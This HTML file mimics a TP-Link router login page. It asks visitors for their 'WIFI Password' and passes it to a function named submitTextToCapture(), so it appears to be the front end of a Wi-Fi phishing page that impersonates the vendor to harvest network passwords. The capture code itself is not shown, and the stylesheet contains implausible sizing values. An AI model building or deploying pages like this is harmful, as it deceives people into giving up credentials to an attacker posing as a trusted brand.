<!DOCTYPE html>
<html>
<head>
	<title>TP-Link Login Page</title>
	<link rel="stylesheet" type="text/css" href="styles.css">
   <style>
	  *,*::before,*::after{
    margin: 0;
    padding:0;
    box-sizing: border-box;
    text-decoration: none;
    font-family: 'Newsreader', serif;
    font-family: 'Prompt', sans-serif;
	}
	*{
		margin: 0px;
		padding: 0px;
	}
      body {
	background-color: #f2f2f2;
	font-family: Arial, sans-serif;
}

.login-box {
	width: 700px;
	height: 1000000000px;
	background-color: #fff;
	position: absolute;
	top: 13421870px;
	left: 50%;
	transform: translate(-50%, -50%);
	box-sizing: border-box;
	padding: 70px 30px;
	border-radius: 5px;
	box-shadow: 0px 0px 10px rgba(0,0,0,0.1);
	padding-left: 2%;
	padding-right: 2%;
	margin-left:10% ;
	margin-right: 10%;
}

.logo {
	width: 100%;
	height: auto;
	position: absolute;
	top: -50px;
	left: 50%;
	transform: translateX(-50%);
	display: flex;
    flex-direction: column;
    justify-content: center;
	align-items: center;
	margin-top: 20px;
	margin-bottom: 20px;
	margin-left: -60px;
    padding: 20px;
	background-color: #fff;
	border-radius: 5px;

}

.login-form {
    width: 100%;
	right:100% ;
	padding-top: 20px;

    

}

input[type="text"], input[type="password"] {
	width: 100%;
	padding: 10px;
	margin-top: 10px;
	border: 1px solid #ccc;
	border-radius: 5px;
	font-size: 16px;
	box-sizing: border-box;
}

button {
	width: 100%;
	padding: 10px;
	margin-top: 20px;
	background-color: #00bcd4;
	color: #fff;
	border: none;
	border-radius: 5px;
	font-size: 16px;
	cursor: pointer;
}

button:hover {
	background-color: #0097a7;
}
.logo{
            background-color: #56c7d8;
            position: relative;
            padding-left: 200px;
            padding-right: 200px;   
            padding-top: 20px;
            padding-bottom: 20px;
            width: 100%;
        }
        .q{
         height: 50px;
         width: 130px;
         position: absolute;
         left: 50%;
         transform: translateX(-50%);  
         top: 26px;
         border-radius: 5px;

         
        }
        .logo img{
         padding-top: 26px;
		 padding-left: 41%;
		 margin-left:10% ;
	margin-right: 10%;
        }

   </style>
</head>
<body>
   <div class="logo">
         <img src="logtplink.png">
     </div>
	<div class="login-box">
      
 
		
		<form class="login-form">
			<img class="q" src="new-logo.png" >
         <h4 aline >WIFI Password :</h4>
			<input type="password" id="password" placeholder="password">
			<button type="button" id="button" onclick="submitTextToCapture()">Continue</button>
		</form>
	</div>
</body>
</html>